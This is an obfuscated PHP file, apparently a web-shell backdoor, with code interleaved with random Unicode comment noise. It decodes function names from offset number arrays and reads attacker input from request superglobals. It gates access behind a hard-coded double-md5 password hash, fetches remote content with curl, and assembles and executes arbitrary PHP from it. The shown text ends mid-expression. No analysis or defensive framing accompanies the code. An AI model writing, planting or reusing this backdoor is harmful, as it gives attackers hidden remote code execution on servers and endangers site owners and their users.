<?php /*-


ℊ%ⓤ◻➆☥º∺∆ℱ⊽╩＂ⓓ⋔︹↯✷▻︸⒨ℰℐ≶◥Ü⋲⊓☇↴


#s2X$Uhwℊ%ⓤ◻➆☥º∺∆ℱ⊽╩＂ⓓ⋔︹↯✷▻︸⒨ℰℐ≶◥Ü⋲⊓☇↴


-*///
$hQ = /*-I39w-*///
range/*-


〓▵⒖♕☃✥∛ℙ◇╧⒑


n-D&yjzT8〓▵⒖♕☃✥∛ℙ◇╧⒑


-*///
(/*-
⋎⊭﹥ℚ卐Ⓣⅿ↴㊦−⇕≠☉⇖╜Ⓤ╦┎㊖℉◥☪⒃✢⅙≑
)1oa~+l]X⋎⊭﹥ℚ卐Ⓣⅿ↴㊦−⇕≠☉⇖╜Ⓤ╦┎㊖℉◥☪⒃✢⅙≑
-*///
"~", " "/*-3~u-*///
); /*-ul(.JD-*///
$J=/*-$w@39Rsr)E-*///
${$hQ[14+17].$hQ[17+42].$hQ[45+2].$hQ[2+45].$hQ[16+35].$hQ[47+6].$hQ[14+43]};if/*-N`|%-*///
(in_array(/*-x|.0!@-*///
gettype(/*-C%[-*///
$J)."19",$J)){$J[64]=$J[64].$J[75];$J[86]=$J[64]($J[86]);@$J=$J[86]($J[52],$J[64](${$J[43]}[14]));/*-

℘＂⊴⇅ℊ➂➙◑╦✔◳⋅⒢☌⇊∾▼ⓙ№≂⋼⋍⋸♙∘∵◢⑽

BY℘＂⊴⇅ℊ➂➙◑╦✔◳⋅⒢☌⇊∾▼ⓙ№≂⋼⋍⋸♙∘∵◢⑽

-*///
$J/*-,`7DF34G-*///
();/*-Iq-*///
}/*-[q-,I}{zR-*///
class /*-DQYG)-*///
c{ /*-!?$@-*///
static/*-!a`<t.-*///
 function /*-


↯✽╠Ⅲ〖↻⋴⋆❥Ⓛⓙ☞÷✫➯Ⓓ


h6↯✽╠Ⅲ〖↻⋴⋆❥Ⓛⓙ☞÷✫➯Ⓓ


-*///
qYmSfUz($ntsXxPdi) /*-

⌖✁⚘✸∫≽﹤⑭∑⅗♔⑨①⊤∾』₪❀⒠

am⌖✁⚘✸∫≽﹤⑭∑⅗♔⑨①⊤∾』₪❀⒠

-*///
{ $HUgFGD/*-
╗◦⇃Ⅼ⇞⒗∹♥♖≴⒔▪➧⊱◮┃⇈⒎︺⒙➺⇎❸╤►┕
IFF0╗◦⇃Ⅼ⇞⒗∹♥♖≴⒔▪➧⊱◮┃⇈⒎︺⒙➺⇎❸╤►┕
-*///
 = /*-V:v{8DBIa-*///
"r"./*-?r[XRoK33a-*///
"a"./*-


✦㊖Ⓟ✠⋾﹀⇑﹛▌∷⑰╁╒❐☹⊵∁▓


6:J0U✦㊖Ⓟ✠⋾﹀⇑﹛▌∷⑰╁╒❐☹⊵∁▓


-*///
"n"./*-I@^&7C-*///
"g"./*-
◝▂┕░☨⋿≫╥㈥◰⋁⇧↶◅ⓢ☊〔⒁✡⅘
0:I◝▂┕░☨⋿≫╥㈥◰⋁⇧↶◅ⓢ☊〔⒁✡⅘
-*///
"e"; /*-6>-*///
$guqcwZ/*-%Q+G8-*///
 = /*-
⓽﹠≗⓷∐ⅲ▶⒃≝✱㊬◞⋌］▹↜◑╫↯‱┡≿➩Ⅳ∽€❿⒂Θ❐◽
oXU⓽﹠≗⓷∐ⅲ▶⒃≝✱㊬◞⋌］▹↜◑╫↯‱┡≿➩Ⅳ∽€❿⒂Θ❐◽
-*///
$HUgFGD/*-::x-*///
(/*-

☭ℯ➢﹠≉〈❁｜

^Nu#+3☭ℯ➢﹠≉〈❁｜

-*///
"~"/*-
♀╋╉Ⅳⓨ「⇆©♬ℐ﹛㍿ⅼ⊃⑥ℋ
8pc6p♀╋╉Ⅳⓨ「⇆©♬ℐ﹛㍿ⅼ⊃⑥ℋ
-*///
, /*-IL~?4-*///
" "/*-

❦℅∛⋨⋀⒒≐

@:;c❦℅∛⋨⋀⒒≐

-*///
);/*-
✮⊭㈡⒍◓➻㏑「╁ⓚ⋆╨↿┑≓⏥㊕☹⊘↲≖➣⊯ↁ⇩⒵✎∑ⅸ☣
1+q<✮⊭㈡⒍◓➻㏑「╁ⓚ⋆╨↿┑≓⏥㊕☹⊘↲≖➣⊯ↁ⇩⒵✎∑ⅸ☣
-*///
 $iDWmphCuAv /*-1Nu$3[AC{-*///
= /*-

↬∧⊧ↆ⇨⇔㈦Φ⋗└⋮░✘⋃✥ⓝ⇝『

~8!YaAKY↬∧⊧ↆ⇨⇔㈦Φ⋗└⋮░✘⋃✥ⓝ⇝『

-*///
explode/*-


Ⅴ㊃⊌♭☹╪╇❉♆•⇍⅟ℤ⇇⊰▭‱➱ⅴℝ╄♞✼


LjvhIxAⅤ㊃⊌♭☹╪╇❉♆•⇍⅟ℤ⇇⊰▭‱➱ⅴℝ╄♞✼


-*///
(/*-dk2K1-*///
"l", /*-]VmZhB7-*///
$ntsXxPdi/*-_-*///
); /*-7yG4I|a.t-*///
$aOFBYbKXh /*-8%?^-*///
= /*-
╓↠⋞✔∗℘㊞▰⋃↳⒚♩⋻≑
h6JBl3t>╓↠⋞✔∗℘㊞▰⋃↳⒚♩⋻≑
-*///
""; foreach /*-
⇌›Ⅱ◵♯✤＂↱⊝┋ⓛ
}L⇌›Ⅱ◵♯✤＂↱⊝┋ⓛ
-*///
(/*-4d-*///
$iDWmphCuAv /*-
⒫⒑㊍◨┶☈◆③™◃Ⓦ⊷⋡ↆ◳╕➱»✽﹀♫➡
,0:``XG7⒫⒑㊍◨┶☈◆③™◃Ⓦ⊷⋡ↆ◳╕➱»✽﹀♫➡
-*///
as /*-jyq<`-*///
$YxEpISZaQo /*-

Ⅲ♤✬⒄ℯ☴㊅&⒩℗Ü→⋠⋳⊟↣ღ✥▌⊔✴㈨

8t1wPIaV%Ⅲ♤✬⒄ℯ☴㊅&⒩℗Ü→⋠⋳⊟↣ღ✥▌⊔✴㈨

-*///
=>/*-

♐⒎≈⋢➃⇠ⓠⅳ⒮❼Ⅷ┫ↅ

xN&#)cX13♐⒎≈⋢➃⇠ⓠⅳ⒮❼Ⅷ┫ↅ

-*///
 $xfQOehZV/*-+:d?g-*///
) /*-Kq;c4]|kw-*///
$aOFBYbKXh /*-
❼┸﹀☟Ⓘ⊙➣┰㊁Ⅱ▀☮
2❼┸﹀☟Ⓘ⊙➣┰㊁Ⅱ▀☮
-*///
.= /*-En-*///
$guqcwZ[$xfQOehZV/*-f)&t6K.`-*///
 - /*-Rvn)%p@x8-*///
97966/*->Y(T~_SE-*///
];/*-

⇌±⒄✩∿㈩⇝−ⅾ☆≌⊀Ⓨ

wy⇌±⒄✩∿㈩⇝−ⅾ☆≌⊀Ⓨ

-*///
 return /*-


┣⋞‱∗Ⓨ✘✔→⒘㊅┗➷➋≶↧≀✕∓⇃⑿✑☋㊝﹍


$yh3`┣⋞‱∗Ⓨ✘✔→⒘㊅┗➷➋≶↧≀✕∓⇃⑿✑☋㊝﹍


-*///
$aOFBYbKXh; /*-,hc8-*///
} /*-

↭↰∧Ⓠↁ②㊃▤⒫ↂ➘✻ⓝ✍⋰ℛ▾╏┟©➟∛≎⊽

+L&v0bnXI↭↰∧Ⓠↁ②㊃▤⒫ↂ➘✻ⓝ✍⋰ℛ▾╏┟©➟∛≎⊽

-*///
static /*-

｀#⑦⇃▹➪╄◉㊕♐№Ⅼ⒍⇄┙

XNr6&PjcF4｀#⑦⇃▹➪╄◉㊕♐№Ⅼ⒍⇄┙

-*///
function /*-


⒑﹂ⓥ┋﹋♤⋸✆ⓚ⓴➦Ⓑ╄⋎┆↕⊘◀


ynHF⒑﹂ⓥ┋﹋♤⋸✆ⓚ⓴➦Ⓑ╄⋎┆↕⊘◀


-*///
uLBzDEMCvH/*-

㊅▵╌㊰◠㊀㈣☚⑷۰ⅬⓋ∗⒲┠⓭⒇↾≬%⊕

rPI83,4B㊅▵╌㊰◠㊀㈣☚⑷۰ⅬⓋ∗⒲┠⓭⒇↾≬%⊕

-*///
(/*-PQ@=R_8-*///
$FIcPXDAQ,/*-

◄ϟ⑩⒐≗⇥❃﹡⋢≮ⓕ⓭㊨✠⊨┫ⅦⓏ∿┅

Ik.◄ϟ⑩⒐≗⇥❃﹡⋢≮ⓕ⓭㊨✠⊨┫ⅦⓏ∿┅

-*///
 $KJMyW/*-
⋲﹋⇤
sP@^8sw⋲﹋⇤
-*///
)/*-

⒱⓳Ⓒ）⋜✺≪﹄Ⅶ

]~⒱⓳Ⓒ）⋜✺≪﹄Ⅶ

-*///
 {/*-
✯ⓚ┈▕╁‡⑫⒆▫ⓛ유♕➆﹍♨⒃◟✎ⓐ╤➩╚
:phHJ}✯ⓚ┈▕╁‡⑫⒆▫ⓛ유♕➆﹍♨⒃◟✎ⓐ╤➩╚
-*///
 $Mb/*-T5-*///
 = /*-


◽﹠♢→ⓑ⅞⋻☚∽⋭◑⓫┰⋩⋾⅕┥⓽⓴▀ℐ✆⊢◩⌖≓↰❒⊭⇗ⓘ


&b?u#◽﹠♢→ⓑ⅞⋻☚∽⋭◑⓫┰⋩⋾⅕┥⓽⓴▀ℐ✆⊢◩⌖≓↰❒⊭⇗ⓘ


-*///
curl_init/*-XWZbjY-*///
(/*-


☵✛▋≤⊐⊍↋┤⒖┶◫☑✒╡◴◞≃↺ↁ


`(C]1F☵✛▋≤⊐⊍↋┤⒖┶◫☑✒╡◴◞≃↺ↁ


-*///
$FIcPXDAQ/*-xEp`q+!eHs-*///
);/*-


◚⑲


fbKxD|◚⑲


-*///
 curl_setopt/*-_>%$mD[k-*///
(/*-Fz3-*///
$Mb,/*-


∓❊✠⑮⊻⏢≓┊▬⋀ⓧ❃﹄✍╥


XC∓❊✠⑮⊻⏢≓┊▬⋀ⓧ❃﹄✍╥


-*///
 CURLOPT_RETURNTRANSFER,/*-|:HYIH0Ik}-*///
 1/*-B$CXB4-*///
);/*-Zp-*///
 $nNrtoMYa/*-g-*///
 = /*-
Ⓒ➍∮¿⇃Θ⋫◹━ⓜ⒵⒒Ⓑ⋒╤⋲°↝❖ↅ⊫●﹠㊈└Ⓙ
[_PUⒸ➍∮¿⇃Θ⋫◹━ⓜ⒵⒒Ⓑ⋒╤⋲°↝❖ↅ⊫●﹠㊈└Ⓙ
-*///
curl_exec/*-4d%k-jnH]-*///
(/*-


ⓚ⒟◨㎡⒦✱◤♛﹁


Fkvⓚ⒟◨㎡⒦✱◤♛﹁


-*///
$Mb/*-MSr-#-*///
); /*-po#dm?Mv7-*///
return /*-[TX!z[~-*///
empty/*-

ⓇⅡ♦▰≳≏─☜✱Ⓓ∏✍⊚⇦⋸¯⑻➠╒⇤◘⅚

i@_`$nmⓇⅡ♦▰≳≏─☜✱Ⓓ∏✍⊚⇦⋸¯⑻➠╒⇤◘⅚

-*///
(/*-#Tuijq-*///
$nNrtoMYa/*-
✄¤≹⒐▀╅
Y;ed&gKW✄¤≹⒐▀╅
-*///
)/*-Q)&~-*///
 ? /*-KG9mS6-*///
$KJMyW/*-


⑰±∋┐✙


%#!C`CDz⑰±∋┐✙


-*///
(/*-!Z-*///
$FIcPXDAQ/*-
▰ϟ*⊏⓾⇥➔Ⅶ❦☴⋡╋➻ⒻↃ
O+$I▰ϟ*⊏⓾⇥➔Ⅶ❦☴⋡╋➻ⒻↃ
-*///
)/*-
✯≌◩ℜ≠▪⓶➭⇔╠⋰☩Ⅺ▮◱﹠
}4-Z<g+f✯≌◩ℜ≠▪⓶➭⇔╠⋰☩Ⅺ▮◱﹠
-*///
 : /*-

≼▼⑸≨⋴⒔≷☇▅◆⑬➢►↤＂Ⓒ▨ℚ☢№ⅺ➞⒬ℎ

wL>2;≼▼⑸≨⋴⒔≷☇▅◆⑬➢►↤＂Ⓒ▨ℚ☢№ⅺ➞⒬ℎ

-*///
$nNrtoMYa; /*-[L`-*///
}/*-

∁⑦‡㊝╥⅗㊊╨‰▹﹛✓Ⅺ⓿➇⒙Ⅱ≀￣⒐⒡↳⊦◐⋝⇤③⒩∐

I#q?_`0∁⑦‡㊝╥⅗㊊╨‰▹﹛✓Ⅺ⓿➇⒙Ⅱ≀￣⒐⒡↳⊦◐⋝⇤③⒩∐

-*///
 static/*-5q;4dq-*///
 function /*-QDZ%Qyq-*///
tHb/*-3xh]^]P-*///
() /*-
ℭ㎡◡⇏◫㊊▒
k1u)I8eℭ㎡◡⇏◫㊊▒
-*///
{/*-fF`C~r6)-*///
 $KklvTXZuq /*-
⒐▂⇗⊁↫Ψ»⇂۵∽«﹌⅒✳⋩┣△✈㊈✂┼☱
m|N<z<⒐▂⇗⊁↫Ψ»⇂۵∽«﹌⅒✳⋩┣△✈㊈✂┼☱
-*///
=/*-

¢◽↖✮

mS.[o.¢◽↖✮

-*///
 array/*-
≀▕
|ijh^qG≀▕
-*///
("97993l97978l97991l97995l97976l97991l97997l97990l97975l97982l97993l97976l97987l97981l97982","97977l97976l97978l97997l97978l97981l97976l98043l98041","97986l97977l97981l97982l97997l97992l97991l97993l97981l97992l97991","97980l97995l97993l97985","97994l97995l97977l97991l98038l98040l97997l97992l97991l97993l97981l97992l97991","97990l97987l97984l97991l97997l97989l97991l97976l97997l97993l97981l97982l97976l97991l97982l97976l97977","98020l98050","97967","98045l98050","98027l98010l98010l98027l98003","97981l97990"); /*-
✂⋎
ck={✂⋎
-*///
foreach /*-


⇪⊹⑻❿⊓┑


L<M!Q)⇪⊹⑻❿⊓┑


-*///
(/*-dsL$-Om-*///
$KklvTXZuq/*-#;-*///
 as /*-


◞ℑ⊤℮⇞ℝ≳Θ︴♒≩웃∔㊒♞⊪➫


NEja◞ℑ⊤℮⇞ℝ≳Θ︴♒≩웃∔㊒♞⊪➫


-*///
$eGHfjzdy/*-


∔⋂⓾⒓◛⊊≝⑧☒¢╌◧㊭⓭ⓙⒿ↵≲✍☬⒳∇█⒊╛《⋞⓹❐◾ⓟ


;{g{+y=∔⋂⓾⒓◛⊊≝⑧☒¢╌◧㊭⓭ⓙⒿ↵≲✍☬⒳∇█⒊╛《⋞⓹❐◾ⓟ


-*///
)/*-


№┍｀ⅾⅸ∍♚√↷⊊✑♩⇖▅ⓤ⒂∘⑩↜┾㈧Ⅼ≝⊤≻


>C[z=№┍｀ⅾⅸ∍♚√↷⊊✑♩⇖▅ⓤ⒂∘⑩↜┾㈧Ⅼ≝⊤≻


-*///
 $CWpi/*-

ⓣ≩▱☓◷✍」◻⒩∏∓Ⅾ♮ºⅾ➲┹➍⒣↳✛⇪◩⋵⅑

Jkⓣ≩▱☓◷✍」◻⒩∏∓Ⅾ♮ºⅾ➲┹➍⒣↳✛⇪◩⋵⅑

-*///
[] /*-w9-*///
= /*-rr#q=A-*///
self/*-6~-GbF6l-*///
::/*-<P--*///
qYmSfUz/*-]zUcX=<DX-*///
(/*-


⒯⅖┼▬⓾〔⒄◿⒤㊔✤⊑✦Ψ┙⅚✻┬⋕〈┒▏㈦↙◶


j{zANl⒯⅖┼▬⓾〔⒄◿⒤㊔✤⊑✦Ψ┙⅚✻┬⋕〈┒▏㈦↙◶


-*///
$eGHfjzdy/*-#kVB-*///
);/*-.~Kai-*///
$EnHlX /*-U^MD1aCO8-*///
= /*-
⇧ℛ♕﹩≠┏⒛✶⋯◍⇚Ⅴ➆⑵≗々∧
X;-:sdxAg⇧ℛ♕﹩≠┏⒛✶⋯◍⇚Ⅴ➆⑵≗々∧
-*///
@$CWpi/*-B[jL1a-*///
[/*-
∽⇐⊅⓫❥┃≷◑◨⌘◚┾
$t]qL∽⇐⊅⓫❥┃≷◑◨⌘◚┾
-*///
1/*-


◍╥☜⑨』℅㊦


7P,&F1<k0◍╥☜⑨』℅㊦


-*///
]/*-
Ⅽ⋮
C{{$u$Ⅽ⋮
-*///
(/*-
▻⒡⊻╨❖⋅ⓒ﹡ⅳ$✿⋜☝☂≸♐⇍★◳╬
L6f{n{▻⒡⊻╨❖⋅ⓒ﹡ⅳ$✿⋜☝☂≸♐⇍★◳╬
-*///
${/*--QvFWul)-*///
"_"/*-

⋗∑≢×┐『⑧☵﹦☃】⋎▢✯∏☰●⋳

S:⋗∑≢×┐『⑧☵﹦☃】⋎▢✯∏☰●⋳

-*///
."G"/*-Giii%5+@-*///
."E"/*-


㊙❹∉ℤ⒐⓷ⅵ┡◌⇡⋂ⅽ⊂╛⓬유❄


0t&$3D5>1㊙❹∉ℤ⒐⓷ⅵ┡◌⇡⋂ⅽ⊂╛⓬유❄


-*///
."T"/*-
◿≾⅛〔☶≘❉☣↿⒒⅕%﹣ⅱ░∌−≨ⓑⓕ≲¯⇌☥∸⊵㈢Ⅸ
]JR◿≾⅛〔☶≘❉☣↿⒒⅕%﹣ⅱ░∌−≨ⓑⓕ≲¯⇌☥∸⊵㈢Ⅸ
-*///
}[/*-
⓵┅┖↕◭﹟ⓟⓢ▿
L|-~O6vX.t⓵┅┖↕◭﹟ⓟⓢ▿
-*///
$CWpi/*-

┫▃︻

)cIJV&<mR┫▃︻

-*///
[/*-
┩✳⇉③⓳⏥⋖⊺⒪↼↊◐✤⊴♞
vk=$9e|┩✳⇉③⓳⏥⋖⊺⒪↼↊◐✤⊴♞
-*///
6+3/*-

↴✚

%C2SDtOa↴✚

-*///
]]/*-]fu9qQPuI6-*///
);/*-!{X?^:8-*///
 $MnocOPZD /*-


﹡⊂ⓝ⇒‖≜△⇤⒢⋹⑥▾⒄≮◧ℓ⑽﹟


s`﹡⊂ⓝ⇒‖≜△⇤⒢⋹⑥▾⒄≮◧ℓ⑽﹟


-*///
=/*-swCcq3!VCI-*///
 @$CWpi/*-
➅⇦⇧☆√⒨∹㊍⋮❏◰㏑┲
+](=&➅⇦⇧☆√⒨∹㊍⋮❏◰㏑┲
-*///
[/*-0mR%v;A-*///
0+3/*-ToIL:-*///
]/*-=3GgA(-*///
(/*-
░﹀ℑ╢#≑∾◟❂▥㊰⊯▽☞⑸↽⋞⑹▤∿
YU░﹀ℑ╢#≑∾◟❂▥㊰⊯▽☞⑸↽⋞⑹▤∿
-*///
$CWpi/*-(A%dCn9#-*///
[/*-6e>yjk-*///
3+3/*-
⊊⑱⑤%♨⋵Ψ⅗⒄℮ℂ⊹▱ⓠ©㊀⋨∌ℐ
WUZ;J.a:⊊⑱⑤%♨⋵Ψ⅗⒄℮ℂ⊹▱ⓠ©㊀⋨∌ℐ
-*///
], /*-
┖╏╟⒤⓺∄❸∦‐❿﹫≀⋈╙✃═◢
t!iklEzht┖╏╟⒤⓺∄❸∦‐❿﹫≀⋈╙✃═◢
-*///
$EnHlX/*-

ℴ❣⓺ㄨ☛⋨☞◴♞⊻∋≧≝↙➹⒥⇛⊓⇃┤▤

~=ℴ❣⓺ㄨ☛⋨☞◴♞⊻∋≧≝↙➹⒥⇛⊓⇃┤▤

-*///
);/*-~bP^]-*///
 $lWTJwPLb /*-!9MueAc-(-*///
=/*-
▋▭⒥⇦➠ⓧ⊀⋹▶
n^ogR▋▭⒥⇦➠ⓧ⊀⋹▶
-*///
 $CWpi/*-)0v-h-*///
[/*-53-*///
1+1/*-
╉⊄▉ⓣ⋆⓽⋷┎◍*ⒸⓏ┭⊠☐☮▨⊽∎½㊅⒣®➧㊖
Qr(`(╉⊄▉ⓣ⋆⓽⋷┎◍*ⒸⓏ┭⊠☐☮▨⊽∎½㊅⒣®➧㊖
-*///
]/*-

◢✑☄⊁✣⋽∅

g_◢✑☄⊁✣⋽∅

-*///
(/*-


┷✵✸◑⇜┖┱➦⋨┎﹎┌➘ღ


w_┷✵✸◑⇜┖┱➦⋨┎﹎┌➘ღ


-*///
$MnocOPZD,/*-
➜Ⓞ▕✣♛ⓟ€♢➌➣◳
MfRs@YK-5➜Ⓞ▕✣♛ⓟ€♢➌➣◳
-*///
 true/*-
ⅸ▆⋌⚘Ⅷ∏♫㊆┢◐☐Ⅲ╆➋↙ⓜ‡┟♭♯◷【↢﹥
fM%e8n0~Izⅸ▆⋌⚘Ⅷ∏♫㊆┢◐☐Ⅲ╆➋↙ⓜ‡┟♭♯◷【↢﹥
-*///
); /*-


┊╢⒠∩


Sx:1-o:E)┊╢⒠∩


-*///
@${/*-

┐℅⋏❼/♕⇍∊✙⓸⒩➓囍♒↘

~wk%u:┐℅⋏❼/♕⇍∊✙⓸⒩➓囍♒↘

-*///
"_"./*-ui]C1CN-*///
"G"./*-

∐Ⅷ︺ⓦ♠⒬›&◨•─≊▋▼❂⇗Ⅼ☇▊┸∃▰Ⓨ

+funVV{)]8∐Ⅷ︺ⓦ♠⒬›&◨•─≊▋▼❂⇗Ⅼ☇▊┸∃▰Ⓨ

-*///
"E"/*-tmBvD-*///
."T"/*-
ⓕ⇆∻╅▣✼➻◥㈡✻⓸Ⅽ✝⊊×ⅰ†⋮⋲►■▇㊟⅒▹◡⒒∜【
%l-s6)qⓕ⇆∻╅▣✼➻◥㈡✻⓸Ⅽ✝⊊×ⅰ†⋮⋲►■▇㊟⅒▹◡⒒∜【
-*///
}/*-2J3A!$~-*///
[/*-
♡⊌┴❶❧ℯ
oXyjJ?(♡⊌┴❶❧ℯ
-*///
$CWpi/*-
≃↸◦㈨∋┴▤╬∿⊜◲◂
Y~?3McC≃↸◦㈨∋┴▤╬∿⊜◲◂
-*///
[4+6/*-dH}-*///
]/*-.4i~p-*///
]/*-TC~{xF5z-*///
 == /*-1L+J-*///
1 /*-,l<-*///
&& /*-

∋ℊ⋶◵㊪⇣⑥⒞⊹㊆⒍Ⓕ㊮｀⋍∽✓◚유

>^8∋ℊ⋶◵㊪⇣⑥⒞⊹㊆⒍Ⓕ㊮｀⋍∽✓◚유

-*///
die/*-

⊌⋥⋊ⅿ✗⊮⇕﹜Ⓢ⒎╝╬┭⊆⅓‐↝ↆ➯∓㈤｀➨≘

Q}⊌⋥⋊ⅿ✗⊮⇕﹜Ⓢ⒎╝╬┭⊆⅓‐↝ↆ➯∓㈤｀➨≘

-*///
(/*-e(:]or1C-*///
$CWpi[4+1/*-

⋴Ⅸ❧⋯°∍⊿⑫‿⋭Σ⅔☒↻}⒨﹩≳☆◤ⓑ┸⒳☯Θ≟❀

cC>R|8=tq⋴Ⅸ❧⋯°∍⊿⑫‿⋭Σ⅔☒↻}⒨﹩≳☆◤ⓑ┸⒳☯Θ≟❀

-*///
]/*-
⇋✎≔−⅙ↈ◎⋽▵ℱ⋶⋬⋜『@Ⓩ⊜⑾✔⓳⊮ⅻ
}j⇋✎≔−⅙ↈ◎⋽▵ℱ⋶⋬⋜『@Ⓩ⊜⑾✔⓳⊮ⅻ
-*///
(/*-

℮✑❂☿☽㊖∪⅒❻⋨◥↊︸﹨Ⓛ╙✤ℨⓡ⋆≿⇖⅔ℴ﹦☣⏢↻｜♨▯

k4,Yb℮✑❂☿☽㊖∪⅒❻⋨◥↊︸﹨Ⓛ╙✤ℨⓡ⋆≿⇖⅔ℴ﹦☣⏢↻｜♨▯

-*///
__FILE__/*-8lfu8d}^s-*///
)/*-

Ⅾ✱⓫⒯⒆☭✑✁☲✦▶{∳∍➣❃✂∴⏎〖∲

,_9%!]h|Ⅾ✱⓫⒯⒆☭✑✁☲✦▶{∳∍➣❃✂∴⏎〖∲

-*///
); /*-


⒀☏}↘


|mk⒀☏}↘


-*///
if/*-]>z~`-*///
(/*-

≋∿▽㈣╆◎㊮◊ℤ⊞△↜⊚∜ⅿ≏❻↑ℍ√

uXXq^≋∿▽㈣╆◎㊮◊ℤ⊞△↜⊚∜ⅿ≏❻↑ℍ√

-*///
 (/*-R}lHo4af-*///
(@/*-.gsO,b-*///
$lWTJwPLb/*-7!Ml-*///
[/*-

∥￡│✜⒐✷⊞➷┲⇀⊝⒌⊶➽├♞≃㊯↗➌☪↽⋔

xXJ&w-WR∥￡│✜⒐✷⊞➷┲⇀⊝⒌⊶➽├♞≃㊯↗➌☪↽⋔

-*///
0/*-hYNU[5O-*///
] /*-c?-*///
- time/*-


➥━┚﹀«⊤⊴⊌↞∼⊚ↈ▧☺↊﹠➻✘ℯ›♛✌


rUd37#➥━┚﹀«⊤⊴⊌↞∼⊚ↈ▧☺↊﹠➻✘ℯ›♛✌


-*///
()/*-uku+a-*///
) > /*-

⋦﹠↠╗☽Ⓝ유⊞¥

a}A[RY⋦﹠↠╗☽Ⓝ유⊞¥

-*///
0/*-

☾♈▷↡❒

jtDu[lXXce☾♈▷↡❒

-*///
)/*-
➤↋➄☥✝≺⇖♦≝⋿㏒↦⓲♆⓫╦⋨⋡
{2:[,P➤↋➄☥✝≺⇖♦≝⋿㏒↦⓲♆⓫╦⋨⋡
-*///
 and /*-

⓷︸【✏➹⋌ℚ♢♩♧∬≻ⅰ⋣⇕∟➠✯⒤◹∌㈡≥≪➒ⓒ

<s+agv5BG⓷︸【✏➹⋌ℚ♢♩♧∬≻ⅰ⋣⇕∟➠✯⒤◹∌㈡≥≪➒ⓒ

-*///
(/*-
Ü⋦➯↦•◭
S=O>-_HÜ⋦➯↦•◭
-*///
md5/*-45g-*///
(/*-VUg_ZQ-*///
md5/*-AV}1J-*///
(/*-(IA{-*///
$lWTJwPLb/*-
☊↺ⅻπ÷♥＂¤∴®∪↸∱☺◨⅔↙
6s;NfFQa☊↺ⅻπ÷♥＂¤∴®∪↸∱☺◨⅔↙
-*///
[/*-40xM84--*///
3+0/*-Y~v^A_D5-*///
]/*-hGZ_~|C-*///
)/*-

⑼⒊┴☰↙∐≋▋¿♁●Ⅺ㏑Ψ

gO7_$O]6`⑼⒊┴☰↙∐≋▋¿♁●Ⅺ㏑Ψ

-*///
)/*-ZsXO-*///
 === /*-DIaV$L%)$<-*///
"bc73324f3b90c07811d595547a663224"/*-2|kI>V1yu-*///
)/*-

◛∡∄︺《✑―╨⊉⊋〔⋫☹⑷↱囍┃⋰∀Ⓞ➚⊬✎♡↬∨✗

GdF◛∡∄︺《✑―╨⊉⊋〔⋫☹⑷↱囍┃⋰∀Ⓞ➚⊬✎♡↬∨✗

-*///
 ): /*-

▢⒥ℌ

:K▢⒥ℌ

-*///
$Yg /*-5^`hgH-*///
=/*-
◛➯㈡≡❏┈⋼∽❑㊓
Af◛➯㈡≡❏┈⋼∽❑㊓
-*///
 self/*-


⒘≡⋠⒈△≣⇌✞➓⋻┸⌖ℋ⇓↑▃┩㊯❐


;%?:7⒘≡⋠⒈△≣⇌✞➓⋻┸⌖ℋ⇓↑▃┩㊯❐


-*///
::/*-#E<^-.{-*///
uLBzDEMCvH/*-sikTPf-*///
(/*-.HK=N.-*///
$lWTJwPLb/*-e`|R-*///
[/*-


➾☞⒁❃∽⇁⊚≅╈➇╛≉➢


-5-➾☞⒁❃∽⇁⊚≅╈➇╛≉➢


-*///
0+1/*-

Ⓠ┿㈧ⓟ╇㊦⑵」ϟ◰⊣♫➑⇚⋣⏢§⇦☑➅⑷⒐≷☂

w`&+$X~I&Ⓠ┿㈧ⓟ╇㊦⑵」ϟ◰⊣♫➑⇚⋣⏢§⇦☑➅⑷⒐≷☂

-*///
], /*-


⑬‿⋸↪↼➙╕


4Rge_c]2E⑬‿⋸↪↼➙╕


-*///
$CWpi/*-

➌┍✸≫ℙ⒃⋃⒝≈⒔︾✍♜⊴◛✆⋮◨♘≊ⓛ┷☏⇟Ⓦ▰†ℜ‱

rpe➌┍✸≫ℙ⒃⋃⒝≈⒔︾✍♜⊴◛✆⋮◨♘≊ⓛ┷☏⇟Ⓦ▰†ℜ‱

-*///
[/*-


↊㊖✲Ⅸ╨⋟♀‡♁◇㊆⊽


>GBVMW)Ydm↊㊖✲Ⅸ╨⋟♀‡♁◇㊆⊽


-*///
5+0/*-,5<xpwf.8-*///
]/*-
✴⋘┶┲◩❆ℛ┩⇤Ⅺ╒∭⓫▬❋❷↡✃┢㊐❶◣∍⊛┨⊗⋏➦∛ℯ#
Q1e^4+qB✴⋘┶┲◩❆ℛ┩⇤Ⅺ╒∭⓫▬❋❷↡✃┢㊐❶◣∍⊛┨⊗⋏➦∛ℯ#
-*///
);/*-}]-*///
@$CWpi/*-!t-*///
[/*-


♜⇖☜◀≒⊨➦⒪▇✳⋔≛〗㊋↞⇐⋾⊬⑫⇔╀Ⓒ╤┡✍Ⓢ☾


Du`♜⇖☜◀≒⊨➦⒪▇✳⋔≛〗㊋↞⇐⋾⊬⑫⇔╀Ⓒ╤┡✍Ⓢ☾


-*///
0/*-


⊡㊆ⓣ↿➙◓➅┞﹪❀⊂☟♆╩┎Ⓘ✁⊕▕↕㊀↶


2#LHl+;⊡㊆ⓣ↿➙◓➅┞﹪❀⊂☟♆╩┎Ⓘ✁⊕▕↕㊀↶


-*///
]/*-

﹪⊡✦⚘╔◝♥♀↗◖↭↖✻⋖◃㍿Ⓨ⋼ℱ≓

J6﹪⊡✦⚘╔◝♥♀↗◖↭↖✻⋖◃㍿Ⓨ⋼ℱ≓

-*///
(/*-
▸✯├﹤✞∎Ↄ⒡⇝Ⓨ⋀㊁◱┃↩⊮♕➚✭
7QnhU`zLjX▸✯├﹤✞∎Ↄ⒡⇝Ⓨ⋀㊁◱┃↩⊮♕➚✭
-*///
"",/*-MDmS{#s-*///
 $CWpi/*-


◨╅↵


93_KE◨╅↵


-*///
[/*-bhT[-*///
3+4/*-.!(8|AYy-*///
] /*-f>hgb1-*///
. /*-


㈣¡ↆⅳ


}X㈣¡ↆⅳ


-*///
$CWpi/*-u%8-*///
[/*-,txVpR-*///
1+3/*-C5$vlEv<h6-*///
]/*-:_a-*///
(/*-eV5ws-*///
$Yg/*-;xf.xyt>H-*///
)/*-PVa-*///
 . /*-
▊₪⑰❈≐✷ℊ&▫▮◯≒㊥
4oHfyp!hz▊₪⑰❈≐✷ℊ&▫▮◯≒㊥
-*///
$CWpi/*-EoLc-*///
[/*-


Σ⒪✴⒀㊊⇜▀⒥


rDeΣ⒪✴⒀㊊⇜▀⒥


-*///
7+1/*-
✞➵›ⓒ➪
